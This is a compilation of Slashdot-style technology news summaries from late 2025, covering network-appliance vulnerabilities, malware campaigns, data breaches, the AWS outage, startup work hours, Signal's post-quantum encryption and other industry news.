Critics question why basic flaws like buffer overflows, command injections, and SQL injections are "being exploited remain prevalent in mission-critical codebases maintained by companies whose core business is cybersecurity," writes CSO Online. Benjamin Harris, CEO of cybersecurity/penetration testing firm watchTowr tells them that "these are vulnerability classes from the 1990s, and security controls to prevent or identify them have existed for a long time. There is really no excuse." Enterprises have long relied on firewalls, routers, VPN servers, and email gateways to protect their networks from attacks. Increasingly, however, these network edge devices are becoming security liabilities themselves... Google's Threat Intelligence Group tracked 75 exploited zero-day vulnerabilities in 2024. Nearly one in three targeted network and security appliances, a strikingly high rate given the range of IT systems attackers could choose to exploit. That trend has continued this year, with similar numbers in the first 10 months of 2025, targeting vendors such as Citrix NetScaler, Ivanti, Fortinet, Palo Alto Networks, Cisco, SonicWall, and Juniper. Network edge devices are attractive targets because they are remotely accessible, fall outside endpoint protection monitoring, contain privileged credentials for lateral movement, and are not integrated into centralized logging solutions...

[R]esearchers have reported vulnerabilities in these systems for over a decade with little attacker interest beyond isolated incidents. That shifted over the past few years with a rapid surge in attacks, making compromised network edge devices one of the top initial access vectors into enterprise networks for state-affiliated cyberespionage groups and ransomware gangs. The COVID-19 pandemic contributed to this shift, as organizations rapidly expanded remote access capabilities by deploying more VPN gateways, firewalls, and secure web and email gateways to accommodate work-from-home mandates. The declining success rate of phishing is another factor... "It is now easier to find a 1990s-tier vulnerability in a border device where Endpoint Detection and Response typically isn't deployed, exploit that, and then pivot from there" [says watchTowr CEL Harris]...

Harris of watchTowr doesn't want to minimize the engineering effort it takes to build a secure system. But he feels many of the vulnerabilities discovered in the past two years should have been caught with automatic code analysis tools or code reviews, given how basic they have been. Some VPN flaws were "trivial to the point of embarrassing for the vendor," he says, while even the complex ones should have been caught by any organization seriously investing in product security... Another problem? These appliances have a lot of legacy code, some that is 10 years or older.
Attackers may need to chain together multiple hard-to-find vulnerabilities across multiple components, the article acknowleges. And "It's also possible that attack campaigns against network-edge devices are becoming more visible to security teams because they are looking into what's happening on these appliances more than they did in the past... "

The article ends with reactions from several vendors of network edge security devices.

Thanks to Slashdot reader snydeq for sharing the article.

The Washington Post reports on 996, "a term popularized in China that refers to a rigid work schedule in which people work from 9 a.m. to 9 p.m., six days a week..." As the artificial intelligence race heats up, many start-ups in Silicon Valley and New York are promoting hardcore culture as a way of life, pushing the limits of work hours, demanding that workers move fast to be first in the market. Some are even promoting 996 as a virtue in the hiring process and keeping "grind scores" of companies... Whoever builds first in AI will capture the market, and the window of opportunity is two to three years, "so you better run faster than everyone else," said Inaki Berenguer, managing partner of venture-capital firm LifeX Ventures.

At San Francisco-based AI start-up Sonatic, the grind culture also allows for meal, gym and pickleball time, said Kinjal Nandy, its CEO. Nandy recently posted a job opening on X that requires in-person work seven days a week. He said working 10-hour days sounds like a lot but the company also offers its first hires perks such as free housing in a hacker house, food delivery credits and a free subscription to the dating service Raya... Mercor, a San Francisco-based start-up that uses AI to match people to jobs, recently posted an opening for a customer success engineer, saying that candidates should have a willingness to work six days a week, and it's not negotiable. "We know this isn't for everyone, so we want to put it up top," the listing reads.

Being in-person rather than remote is a requirement at some start-ups. AI start-up StarSling had two engineering job descriptions that required six days a week of in-person work. In a job description for an engineer, Rilla, an AI company in New York, said candidates should not work at the company if they're not excited about working about 70 hours a week in person. One venture capitalist even started tracking "grind scores." Jared Sleeper, a partner at New York-based venture capital firm Avenir, recently ranked public software companies' "grind score" in a post on X, which went viral. Using data from Glassdoor, it ranks the percentage of employees who have a positive outlook for the company compared with their views on work-life balance.
"At Google's AI division, cofounder Sergey Brin views 60 hours per week as the 'sweet spot' for productivity," notes the Independent: Working more than 55 hours a week, compared with a standard 35-40-hour week, is linked to a 35 percent higher risk of stroke and a 17 percent higher risk of death from heart disease, according to the World Health Organization. Productivity also suffers. A British study shows that working beyond 60 hours a week can reduce overall output, slow cognitive performance, and impair tasks ranging from call handling to problem-solving.

Shorter workweeks, in contrast, appear to boost productivity. Microsoft Japan saw a roughly 40% increase in output after adopting a four-day work week. In a UK trial, 61 companies that tested a four-day schedule reported revenue gains, with 92 percent choosing to keep the policy, according to Bloomberg.

An anonymous reader quotes a report from Tom's Guide: Microsoft Teams is about to deal a heavy blow to those who like to work from home for peace and quiet. In a new feature update rolling out December 2025, the platform will track a worker's location using the office Wi-Fi, to see whether you're actually there or not. From a boss' perspective, this would eliminate any of that confusion as to where your team actually is. But for those people who have found their own sanctuary of peaceful productivity by working from home, consider this a warning that Teams is about to tattle on you. According to the Microsoft 365 roadmap: "When users connect to their organization's Wi-Fi, Teams will automatically set their work location to reflect the building they are working in." The location of that worker will apparently update automatically upon connecting.

It's set to launch on Windows and macOS, with rollout starting at the end of this year. "This feature will be off by default," notes Microsoft. But "tenant admins will decide whether to enable it and require end-users to opt-in."

Hackers have been spreading malware through more than 3,000 YouTube videos advertising cracked software and game hacks, cybersecurity firm Check Point warned this week. The campaign, active since at least 2021, tripled its video production in 2025. The videos promoted free versions of Adobe Photoshop, FL Studio, Microsoft Office, and game cheats for titles like Roblox. Fake comments created the appearance of legitimacy, the researchers found.

Users who downloaded archives from Dropbox, Google Drive, or MediaFire were instructed to disable Windows Defender before opening files. The downloads contained malware including Lumma and Rhadamanthys, which steal passwords and cryptocurrency wallet information. The hackers hijacked existing accounts and created new ones. One compromised channel with 129,000 subscribers posted a cracked Photoshop video that reached 291,000 views. Another video for FL Studio received over 147,000 views.

Microsoft has reorganized its Outlook team under new leadership as part of a broader effort to integrate AI into its core products. Gaurav Sareen, a corporate vice president at the company, recently assumed direct leadership of the Outlook division after Lynn Ayres, who previously ran the team, began a sabbatical. The move represents the latest in a series of AI-focused restructurings across Microsoft's divisions. Sareen wrote in an internal memo that the company now has an opportunity to reimagine Outlook from the ground up rather than add AI features to existing systems, according to The Verge.

Ryan Roslansky, the chief executive of LinkedIn, took on an expanded role earlier this year as head of Office. Sareen now reports to Roslansky, who oversees the Office suite, Outlook and Microsoft 365 Copilot teams. The restructuring comes after Microsoft spent several years developing One Outlook, a web-based version meant to replace separate Windows, Mac, and web applications.

Samsung and SK Hynix have raised DRAM and NAND flash prices by up to 30% for the fourth quarter, Korean publications report. The two Korean memory giants passed the new rates on to customers as analysts predict the AI-driven memory supercycle will be longer and stronger than past boom periods.

Several leading international electronics and server companies are stockpiling memory and negotiating long-term supply deals spanning two to three years. U.S. and Chinese electronics firms and data center operators are exploring mid-to-long-term contracts. Companies typically sign DRAM contracts on a quarterly or annual basis.

An anonymous reader writes: Gboard has introduced some significant changes to the app over the past few weeks, making typing on the app much easier than ever before. You can now resize the keyboard to your desired size, and there's even something in the works that will make adding apostrophes to your text even more seamless.

If all of that wasn't enough, the app is now introducing a feature that some will find peculiar, which will allow users to remove the period and common punctuation keys from Gboard. This news comes to us from 9to5Google, sharing that this is now an option with the latest version of the app.

Fujitsu has released a new laptop in Japan with a built-in Blu-ray drive. The FMV Note A A77-K3 includes a BDXL-compatible optical drive that can read and burn discs. Most laptop manufacturers globally stopped including optical drives in the second half of the 2010s. The Japanese market has refused to follow that trend.

Shops in Tokyo's Akihabara district recently experienced a spike in demand for optical drives and systems capable of reading Blu-ray discs, Tom's Hardware reports. Fujitsu sells two additional models in the FMV Note A line using Intel thirteenth-generation chips. Those systems include DVD drives instead of Blu-ray capability. Some other Japanese manufacturers also released optical-drive-equipped laptops earlier in 2025.

OpenBSD 7.8 has been released, adding Raspberry Pi 5 support, enhanced AMD Secure Encrypted Virtualization (SEV-ES) capabilities, and expanded hardware compatibility including new Qualcomm, Rockchip, and Apple ARM drivers. Phoronix reports: OpenBSD 7.8 also brings multiple improvements around enabling AMD Secure Encrypted Virtualization (AMD SEV) support with support for the PSP ioctl for encrypting and measuring state for SEV-ES, a new VMD option to run guests in SEV-ES mode, and other enablement work pertaining to that AMD SEV work in SEV-ES form at this point as a precursor to SEV-SNP. AMD SEV-ES should be working to start confidential virtual machines (VMs) when using the VMM/VMD hypervisor and the OpenBSD guests with KVM/QEMU.

OpenBSD 7.8 also improves compatibility of the FUSE file-system support with the Linux implementation, suspend/hibernate improvements, SMP improvements, updating to the Linux 6.12.50 DRM graphics drivers, several new Rockchip drivers, Raspberry Pi RP1 drivers, H.264 video support for the uvideo driver, and many network driver improvements. The changelog and download page can be found via OpenBSD.org.

Early Monday, an Amazon Web Services outage disrupted banks, games, and Peloton classes. Eight Sleep customers faced a different problem. Their internet-enabled mattresses malfunctioned. People woke to beds locked in upright positions, excessive heat, flashing lights, and unexpected alarms. Matteo Franceschetti, the company's chief executive, apologized and said engineers were building an outage-proof mode. By Monday evening, all devices functioned again, though some experienced data processing delays. The mattresses adjust temperature between 55 and 110 degrees and elevate bodies into different positions. They activate soundscapes and vibrational alarms. The advanced models cost over $5,000. A yearly subscription of $199 to $399 is required for temperature controls.

An anonymous reader quotes a report from the Financial Times: A lot of critical financial and government infrastructure runs on Cobol. The more-than-60-year-old mainframe coding language is embedded into payments and transaction rails, even though there are very few Cobol-literate coders available to maintain them. The big argument in favor of sticking with Cobol systems is that they work. The catch is that, whenever they stop working, it is difficult to figure out why. That's not good in a crisis, which is exactly when they're most likely to break. Covid-19 put a lot of strain the US state benefit systems.

The ones that used Cobol for processing unemployment claims failed spectacularly, according to a new working paper from The Atlanta Fed: "States that used an antiquated [unemployment insurance]-benefit system experienced a 2.8 percentage point decline in total credit and debit card consumption relative to card consumption in states with more modern UI benefit systems. [...] Using this estimate in a back-of-the-envelope calculation, I find that the lack of investment in updating UI-benefit systems in COBOL states was associated with a reduction in real GDP of at least $40 billion (in 2019 dollars) lower during this [March 13 2020 to year-end] period

The paper uses Cobol as a proxy for old and inefficient IT, not the direct cause of failure. Claimants faced much longer delays in the 28 states that still used Cobol in 2020, both because of the unprecedented volume of claims and the difficulty updating systems with new eligibility rules, author Michael Navarrete finds. [...] As an aside, one oddity of the data is that Republican-controlled states were more likely to have replaced old IT systems, even though their standard unemployment insurance payments are lower on average. Why? Absolutely no idea, but here are the maps. And, once adjusted for state politics, here's the key finding.

joshuark shares a report from BleepingComputer: A new malicious campaign is targeting macOS developers with fake Homebrew, LogMeIn, and TradingView platforms that deliver infostealing malware like AMOS (Atomic macOS Stealer) and Odyssey. The campaign employs "ClickFix" techniques where targets are tricked into executing commands in Terminal, infecting themselves with malware. Researchers at threat hunting company Hunt.io identified more than 85 domains impersonating the three platforms in this campaign [...].

When checking some of the domains, BleepingComputer discovered that in some cases the traffic to the sites was driven via Google Ads, indicating that the threat actor promoted them to appear in Google Search results. The malicious sites feature convincing download portals for the fake apps and instruct users to copy a curl command in their Terminal to install them, the researchers say. In other cases, like for TradingView, the malicious commands are presented as a "connection security confirmation step." However, if the user clicks on the 'copy' button, a base64-encoded installation command is delivered to the clipboard instead of the displayed Cloudflare verification ID.

OpenAI released ChatGPT Atlas on Tuesday, an AI-powered web browser that CEO Sam Altman described as "smooth" and "quick" during a livestream announcement. The browser is available globally on macOS while versions for Windows, iOS, and Android are expected soon. Atlas includes memory features that personalize the browsing experience and an agent mode that allows ChatGPT to perform tasks such as booking reservations and flights or editing documents.

Users can manage these stored memories through the browser's settings and can open incognito windows. The browser displays a split-screen view by default when users click links from search results. The view shows both the webpage and the ChatGPT transcript simultaneously. Atlas also offers webpage summarization and a feature called "cursor chat" that allows users to select text and have ChatGPT revise it inline.

Foreign hackers breached the National Nuclear Security Administration's Kansas City National Security Campus (KCNSC) by exploiting unpatched Microsoft SharePoint vulnerabilities. The intrusion happened in August and is possibly linked to either Chinese state actors or Russian cybercriminals. CSO Online notes that "roughly 80% of the non-nuclear parts in the nation's nuclear stockpile originate from KCNSC," making it "one of the most sensitive facilities in the federal weapons complex." From the report: The breach targeted a plant that produces the vast majority of critical non-nuclear components for US nuclear weapons under the NNSA, a semi-autonomous agency within the Department of Energy (DOE) that oversees the design, production, and maintenance of the nation's nuclear weapons. Honeywell Federal Manufacturing & Technologies (FM&T) manages the Kansas City campus under contract to the NNSA. [...] The attackers exploited two recently disclosed Microsoft SharePoint vulnerabilities -- CVE-2025-53770, a spoofing flaw, and CVE-2025-49704, a remote code execution (RCE) bug -- both affecting on-premises servers. Microsoft issued fixes for the vulnerabilities on July 19.

On July 22, the NNSA confirmed it was one of the organizations hit by attacks enabled by the SharePoint flaws. "On Friday, July 18th, the exploitation of a Microsoft SharePoint zero-day vulnerability began affecting the Department of Energy," a DOE spokesperson said. However, the DOE contended at the time, "The department was minimally impacted due to its widespread use of the Microsoft M365 cloud and very capable cybersecurity systems. A very small number of systems were impacted. All impacted systems are being restored." By early August, federal responders, including personnel from the NSA, were on-site at the Kansas City facility, the source tells CSO.

An anonymous reader shares a report: A hacking group that recently doxed hundreds of government officials, including from the Department of Homeland Security (DHS) and Immigration and Customs Enforcement (ICE), has now built dossiers on tens of thousands of U.S. government officials, including NSA employees, a member of the group told 404 Media. The member said the group did this by digging through its caches of stolen Salesforce customer data. The person provided 404 Media with samples of this information, which 404 Media was able to corroborate.

As well as NSA officials, the person sent 404 Media personal data on officials from the Defense Intelligence Agency (DIA), the Federal Trade Commission (FTC), Federal Aviation Administration (FAA), Centers for Disease Control and Prevention (CDC), the Bureau of Alcohol, Tobacco, Firearms and Explosives (ATF), members of the Air Force, and several other agencies.

A Court of Accounts report written before Sunday's theft of crown jewels from the Louvre revealed the museum's security systems were outdated and inadequate [non-paywalled source]. The report noted a lack of basic CCTV equipment across multiple wings. Cameras had mainly been installed only when rooms were refurbished due to repeated postponements of scheduled modernization. In the Denon wing where the Apollo Gallery was targeted, a third of rooms had no CCTV cameras. Three-quarters of rooms in the Richelieu wing and nearly two-thirds in the Sully wing lacked cameras.

The thieves were caught on camera at one point but were masked and impossible to identify, according to Paris public prosecutor Laure Beccuau. The alarm system activated when thieves cut open display cases, but they threatened staff who left the area. Culture minister Rachida Dati confirmed new CCTV cameras would be installed. President Macron had earmarked $186.30 million to upgrade the Louvre's security systems under a renaissance plan launched in June.

AWS experienced a three-hour outage early Monday morning that disrupted thousands of websites and applications across the globe. The cloud computing provider reported DNS problems with DynamoDB in its US-EAST-1 region in northern Virginia starting at 12:11 a.m. Pacific time. Over 4 million users reported issues, according to Downdetector. Snapchat saw reports spike from more than 22,000 to around 4,000 as systems recovered. Roblox dropped from over 12,600 complaints to fewer than 500. Reddit and the financial platform Chime remained affected longer. Perplexity, Coinbase and Robinhood attributed their platform disruptions directly to AWS.

Gaming platforms including Fortnite, Clash Royale and Clash of Clans went offline. Signal confirmed the messaging app was down. In Britain, Lloyd Bank, Bank of Scotland, Vodafone, BT, and the HMRC website faced problems. United Airlines reported disrupted access to its app and website overnight. Some internal systems were temporarily affected. Delta experienced a small number of minor flight delays. By 3:35 a.m. Pacific time, AWS said the issue had been fully mitigated. Most service operations were succeeding normally though some requests faced throttling during final resolution. AWS holds roughly one-third of the cloud infrastructure market ahead of Microsoft and Google.

"Windows Recovery Environment (RE), as the name suggests, is a built-in set of tools inside Windows that allow you to troubleshoot your computer, including booting into the BIOS, or starting the computer in safe mode," writes Tom's Hardware.

"It's a crucial piece of software that has now, unfortunately, been rendered useless (for many) as part of the latest Windows update." A new bug discovered in Windows 11's October build, KB5066835, makes it so that your USB keyboard and mouse stop working entirely, so you cannot interact with the recovery UI at all.

This problem has already been recognized and highlighted by Microsoft, who clarified that a fix is on its way to address this issue. Any plugged-in peripherals will continue to work just fine inside the actual operating system, but as soon as you go into Windows RE, your USB keyboard and mouse will become unresponsive. It's important to note that if your PC fails to start-up for any reason, it defaults to the recovery environment to, you know, recover and diagnose any issues that might've been preventing it from booting normally.

Note that those hanging onto old PS/2-connector equipped keyboards and mice seem to be unaffected by this latest Windows software gaffe.

On Cloudflare's blog, a senior research engineer shares a plan for "improving the trustworthiness of JavaScript on the web."

"It is as true today as it was in 2011 that Javascript cryptography is Considered Harmful." The main problem is code distribution. Consider an end-to-end-encrypted messaging web application. The application generates cryptographic keys in the client's browser that lets users view and send end-to-end encrypted messages to each other. If the application is compromised, what would stop the malicious actor from simply modifying their Javascript to exfiltrate messages? It is interesting to note that smartphone apps don't have this issue. This is because app stores do a lot of heavy lifting to provide security for the app ecosystem. Specifically, they provide integrity, ensuring that apps being delivered are not tampered with, consistency, ensuring all users get the same app, and transparency, ensuring that the record of versions of an app is truthful and publicly visible.

It would be nice if we could get these properties for our end-to-end encrypted web application, and the web as a whole, without requiring a single central authority like an app store. Further, such a system would benefit all in-browser uses of cryptography, not just end-to-end-encrypted apps. For example, many web-based confidential LLMs, cryptocurrency wallets, and voting systems use in-browser Javascript cryptography for the last step of their verification chains. In this post, we will provide an early look at such a system, called Web Application Integrity, Consistency, and Transparency (WAICT) that we have helped author. WAICT is a W3C-backed effort among browser vendors, cloud providers, and encrypted communication developers to bring stronger security guarantees to the entire web... We hope to build even wider consensus on the solution design in the near future....

We would like to have a way of enforcing integrity on an entire site, i.e., every asset under a domain. For this, WAICT defines an integrity manifest, a configuration file that websites can provide to clients. One important item in the manifest is the asset hashes dictionary, mapping a hash belonging to an asset that the browser might load from that domain, to the path of that asset.
The blog post points out that the WEBCAT protocol (created by the Freedom of Press Foundation) "allows site owners to announce the identities of the developers that have signed the site's integrity manifest, i.e., have signed all the code and other assets that the site is serving to the user... We've made WAICT extensible enough to fit WEBCAT inside and benefit from the transparency components." The proposal also envisions a service storing metadata for transparency-enabled sites on the web (along with "witnesses" who verify the prefix tree holding the hashes for domain manifests).

"We are still very early in the standardization process," with hopes to soon "begin standardizing the integrity manifest format. And then after that we can start standardizing all the other features. We intend to work on this specification hand-in-hand with browsers and the IETF, and we hope to have some exciting betas soon. In the meantime, you can follow along with our transparency specification draft,/A>, check out the open problems, and share your ideas."

"My boss thinks AI will solve every problem and is wildly enthusiastic about it," complains a mid-level worker at a Fortune 500 company, who considers the technology "unproven and wildly erratic."

So how should they navigate the next 10 years until retirement, they ask the Washington Post's "Work Advice" columnist. The columnist first notes that "Despite promises that AI will eliminate tedious, 'low-value' tasks from our workload, many consumers and companies seem to be using it primarily as a cheap shortcut to avoid hiring professional actors, writers or artists — whose work, in some cases, was stolen to train the tools usurping them..." Kevin Cantera, a reader from Las Cruces, New Mexico [a writer for an education-tech compay], willingly embraced AI for work. But as it turns out, he was training his replacement... Even without the "AI will take our jobs" specter, there's much to be wary of in the AI hype. Faster isn't always better. Parroting and predicting linguistic patterns isn't the same as creativity and innovation... There are concerns about hallucinations, faulty data models, and intentional misuse for purposes of deception. And that's not even addressing the environmental impact of all the power- and water-hogging data centers needed to support this innovation.

And yet, it seems, resistance may be futile. The AI genie is out of the bottle and granting wishes. And at the rate it's evolving, you won't have 10 years to weigh the merits and get comfortable with it. Even if you move on to another workplace, odds are AI will show up there before long. Speaking as one grumpy old Luddite to another, it might be time to get a little curious about this technology just so you can separate helpfulness from hype.

It might help to think of AI as just another software tool that you have to get familiar with to do your job. Learn what it's good for — and what it's bad at — so you can recommend guidelines for ethical and beneficial use. Learn how to word your wishes to get accurate results. Become the "human in the loop" managing the virtual intern. You can test the bathwater without drinking it. Focus on the little ways AI can accommodate and support you and your colleagues. Maybe it could handle small tasks in your workflow that you wish you could hand off to an assistant. Automated transcriptions and meeting notes could be a life-changer for a colleague with auditory processing issues.

I can't guarantee that dabbling in AI will protect your job. But refusing to engage definitely won't help. And if you decide it's time to change jobs, having some extra AI knowledge and experience under your belt will make you a more attractive candidate, even if you never end up having to use it.

Cory Doctorow has always warned that companies "enshittify" their services — shifting "as much as they can from users, workers, suppliers, and business customers to themselves." But this week Doctorow writes in Communications of the ACM that enshittification "would be much, much worse if not for tech workers," who have "the power to tell their bosses to go to hell..." When your skills are in such high demand that you can quit your job, walk across the street, and get a better one later that same day, your boss has a real incentive to make you feel like you are their social equal, empowered to say and do whatever feels technically right... The per-worker revenue for successful tech companies is unfathomable — tens or even hundreds of times their wages and stock compensation packages.
"No wonder tech bosses are so excited about AI coding tools," Doctorow adds, "which promise to turn skilled programmers from creative problem-solvers to mere code reviewers for AI as it produces tech debt at scale. Code reviewers never tell their bosses to go to hell, and they are a lot easier to replace."

So how should tech workers respond in a world where tech workers are now "as disposable as Amazon warehouse workers and drivers...?" Throughout the entire history of human civilization, there has only ever been one way to guarantee fair wages and decent conditions for workers: unions. Even non-union workers benefit from unions, because strong unions are the force that causes labor protection laws to be passed, which protect all workers. Tech workers have historically been monumentally uninterested in unionization, and it's not hard to see why. Why go to all those meetings and pay those dues when you could tell your boss to go to hell on Tuesday and have a new job by Wednesday? That's not the case anymore. It will likely never be the case again.

Interest in tech unions is at an all-time high. Groups such as Tech Solidarity and the Tech Workers Coalition are doing a land-office business, and copies of Ethan Marcotte's You Deserve a Tech Union are flying off the shelves. Now is the time to get organized. Your boss has made it clear how you'd be treated if they had their way. They're about to get it.
Thanks to long-time Slashdot reader theodp for sharing the article.

"Eleven days ago, the nonprofit entity that develops the protocol, Signal Messenger LLC, published a 5,900-word write-up describing its latest updates that bring Signal a significant step toward being fully quantum-resistant," writes Ars Technica: The mechanism that has made this constant key evolution possible over the past decade is what protocol developers call a "double ratchet." Just as a traditional ratchet allows a gear to rotate in one direction but not in the other, the Signal ratchets allow messaging parties to create new keys based on a combination of preceding and newly agreed-upon secrets. The ratchets work in a single direction, the sending and receiving of future messages. Even if an adversary compromises a newly created secret, messages encrypted using older secrets can't be decrypted... [Signal developers describe a "ping-pong" behavior as parties take turns replacing ratchet key pairs one at a time.] Even though the ping-ponging keys are vulnerable to future quantum attacks, they are broadly believed to be secure against today's attacks from classical computers.

The Signal Protocol developers didn't want to remove them or the battle-tested code that produces them. That led to their decision to add quantum resistance by adding a third ratchet. This one uses a quantum-safe Key-Encapsulation Mechanism (KEM) to produce new secrets much like the Diffie-Hellman ratchet did before, ensuring quantum-safe, post-compromise security... The technical challenges were anything but easy. Elliptic curve keys generated in the X25519 implementation are about 32 bytes long, small enough to be added to each message without creating a burden on already constrained bandwidths or computing resources. A ML-KEM 768 key, by contrast, is 1,000 bytes. Additionally, Signal's design requires sending both an encryption key and a ciphertext, making the total size 2,272 bytes... To manage the asynchrony challenges, the developers turned to "erasure codes," a method of breaking up larger data into smaller pieces such that the original can be reconstructed using any sufficiently sized subset of chunks...

The Signal engineers have given this third ratchet the formal name: Sparse Post Quantum Ratchet, or SPQR for short. The third ratchet was designed in collaboration with PQShield, AIST, and New York University. The developers presented the erasure-code-based chunking and the high-level Triple Ratchet design at the Eurocrypt 2025 conference. Outside researchers are applauding the work. "If the normal encrypted messages we use are cats, then post-quantum ciphertexts are elephants," Matt Green, a cryptography expert at Johns Hopkins University, wrote in an interview. "So the problem here is to sneak an elephant through a tunnel designed for cats. And that's an amazing engineering achievement. But it also makes me wish we didn't have to deal with elephants."
Thanks to long-time Slashdot reader mspohr for sharing the article.

Microsoft said in a blog post this week that "over half of cyberattacks with known motives were driven by extortion or ransomware... while attacks focused solely on espionage made up just 4%."

And Microsoft's annual digital threats report found operations expanding even more through AI, with cybercriminals "accelerating malware development and creating more realistic synthetic content, enhancing the efficiency of activities such as phishing and ransomware attacks." [L]egacy security measures are no longer enough; we need modern defenses leveraging AI and strong collaboration across industries and governments to keep pace with the threat...

Over the past year, both attackers and defenders harnessed the power of generative AI. Threat actors are using AI to boost their attacks by automating phishing, scaling social engineering, creating synthetic media, finding vulnerabilities faster, and creating malware that can adapt itself... For defenders, AI is also proving to be a valuable tool. Microsoft, for example, uses AI to spot threats, close detection gaps, catch phishing attempts, and protect vulnerable users. As both the risks and opportunities of AI rapidly evolve, organizations must prioritize securing their AI tools and training their teams...

Amid the growing sophistication of cyber threats, one statistic stands out: more than 97% of identity attacks are password attacks. In the first half of 2025 alone, identity-based attacks surged by 32%. That means the vast majority of malicious sign-in attempts an organization might receive are via large-scale password guessing attempts. Attackers get usernames and passwords ("credentials") for these bulk attacks largely from credential leaks. However, credential leaks aren't the only place where attackers can obtain credentials. This year, we saw a surge in the use of infostealer malware by cybercriminals...

Luckily, the solution to identity compromise is simple. The implementation of phishing-resistant multifactor authentication (MFA) can stop over 99% of this type of attack even if the attacker has the correct username and password combination.
"Security is not only a technical challenge but a governance imperative..." Microsoft adds in their blog post. "Governments must build frameworks that signal credible and proportionate consequences for malicious activity that violates international rules." (The report also found that America is the #1 most-targeted country — and that many U.S. companies have outdated cyber defenses.)

But while "most of the immediate attacks organizations face today come from opportunistic criminals looking to make a profit," Microsoft writes that nation-state threats "remain a serious and persistent threat." More details from the Associated Press: Russia, China, Iran and North Korea have sharply increased their use of artificial intelligence to deceive people online and mount cyberattacks against the United States, according to new research from Microsoft. This July, the company identified more than 200 instances of foreign adversaries using AI to create fake content online, more than double the number from July 2024 and more than ten times the number seen in 2023.
Examples of foreign espionage cited by the article:

• China is continuing its broad push across industries to conduct espionage and steal sensitive data...

• Iran is going after a wider range of targets than ever before, from the Middle East to North America, as part of broadening espionage operations..

• "[O]utside of Ukraine, the top ten countries most affected by Russian cyber activity all belong to the North Atlantic Treaty Organization (NATO) — a 25% increase compared to last year."

• North Korea remains focused on revenue generation and espionage...

There was one especially worrying finding. The report found that critical public services are often targeted, partly because their tight budgets limit their incident response capabilities, "often resulting in outdated software.... Ransomware actors in particular focus on these critical sectors because of the targets' limited options. For example, a hospital must quickly resolve its encrypted systems, or patients could die, potentially leaving no other recourse but to pay."

"A new study published on Monday found that communications from cellphone carriers, retailers, banks, and even militaries are being broadcast unencrypted through geostationary satellites..." reports Gizmodo. "The team obtained unencrypted internet communications from U.S. military sea vessels and even communications regarding narcotics trafficking from Mexican military and law enforcement." Researchers from the University of California, San Diego (UCSD) and the University of Maryland scanned 39 of these satellites from a rooftop in Southern California over three years. They found that roughly half of the signals they analyzed were transmitting unencrypted data, potentially exposing everything from phone calls and military logistics to a retail chain's inventory. "There is a clear mismatch between how satellite customers expect data to be secured and how it is secured in practice," the researchers wrote in their paper titled "Don't Look Up: There Are Sensitive Internal Links in the Clear on GEO Satellites...." "They assumed that no one was ever going to check and scan all these satellites and see what was out there. That was their method of security," Aaron Schulman, a UCSD professor and co-lead of the study, told Wired....

Even more surprisingly, the researchers didn't need any fancy spy gear to collect this data. Their setup used only off-the-shelf hardware, including a $185 satellite dish, a $140 roof mount with a $195 motor, and a $230 tuner card. Altogether, the system cost roughly $750 and was installed on a university building in La Jolla, San Diego.

With their simple setup, the researchers were able to collect a wide range of communication data, including phone calls, texts, in-flight Wi-Fi data from airline passengers, and signals from electric utilities. They even obtained U.S. and Mexican military and law enforcement communications, as well as ATM transactions and corporate communications... When it came to telecoms, specifically, the team collected phone numbers, calls, and texts from customers of T-Mobile, AT&T Mexico, and Telmex... It only took the team nine hours to collect the phone numbers of over 2,700 T-Mobile users, along with some of their calls and text messages.
T-Mobile told Gizmodo the lack of encryption was "a vendor's technical misconfiguration" affecting "a limited number of cell sites" and was "not network-wide... [W]e implemented nationwide Session Initiation Protocol (SIP) encryption for all customers to further protect signaling traffic as it travels between mobile handsets and the network core, including call set up, numbers dialed and text message content. We appreciate our collaboration with the security research community, whose work helps reinforce our ongoing commitment to protecting customer data and enhances security across the industry."

Indeed, the researchers write that "Each time we discovered sensitive information in our data, we went through considerable effort to determine the responsible party, establish contact, and disclose the vulnerability. In several cases, the responsible party told us that they had deployed a remedy. For the following parties, we re-scanned with their permission and were able to verify a remedy had been deployed: T-Mobile, WalMart, and KPU."

The researchers acknowledge that exposure "was limited to a relatively small number of cell towers in specific remote areas."

Cybercriminals are exploiting weak email authentication settings in Zendesk, using the platform's customer support systems to bombard targets with thousands of spam and harassing messages that appear to come from legitimate companies like The Washington Post, Discord, and NordVPN. KrebsOnSecurity reports: Zendesk is an automated help desk service designed to make it simple for people to contact companies for customer support issues. Earlier this week, KrebsOnSecurity started receiving thousands of ticket creation notification messages through Zendesk in rapid succession, each bearing the name of different Zendesk customers, such as CapCom, CompTIA, Discord, GMAC, NordVPN, The Washington Post, and Tinder.

The abusive missives sent via Zendesk's platform can include any subject line chosen by the abusers. In my case, the messages variously warned about a supposed law enforcement investigation involving KrebsOnSecurity.com, or else contained personal insults. Moreover, the automated messages that are sent out from this type of abuse all come from customer domain names -- not from Zendesk. [...]

In all of the cases above, the messaging abuse would not have been possible if Zendesk customers validated support request email addresses prior to sending responses. Failing to do so may make it easier for Zendesk clients to handle customer support requests, but it also allows ne'er-do-wells to sully the sender's brand in service of disruptive and malicious email floods. "We recognize that our systems were leveraged against you in a distributed, many-against-one manner," said Carolyn Camoens, communications director at Zendesk. "We are actively investigating additional preventive measures. We are also advising customers experiencing this type of activity to follow our general security best practices and configure an authenticated ticket creation workflow."

Hackers breached financial services firm Prosper, stealing the personal data of roughly 17.6 million people, including Social Security numbers, income details, and government IDs. "We have evidence that confidential, proprietary, and personal information, including Social Security Numbers, was obtained, including through unauthorized queries made on Company databases that store customer information and applicant data. We will be offering free credit monitoring as appropriate after we determine what data was affected," the company says. "The investigation is still in its very early stages, but resolving this incident is our top priority and we are committed to sharing additional information with our customers as appropriate." BleepingComputer reports: Prosper operates as a peer-to-peer lending marketplace that has helped over 2 million customers secure more than $30 billion in loans since its founding in 2005. As the company disclosed one month ago on a dedicated page, the breach was detected on September 2, but Prosper has yet to find evidence that the attackers gained access to customer accounts and funds.

However, the attackers stole data belonging to Prosper customers and loan applicants. The company hasn't shared what information was exposed beyond Social Security numbers because it's still investigating what data was affected. Prosper added that the security breach didn't impact its customer-facing operations and that it has reported the incident to relevant authorities and is collaborating with law enforcement to investigate the attack. [...] The stolen information also includes customers' names, government-issued IDs, employment status, credit status, income levels, dates of birth, physical addresses, IP addresses, and browser user agent details. Have I Been Pwned revealed the extent of the incident on Thursday.

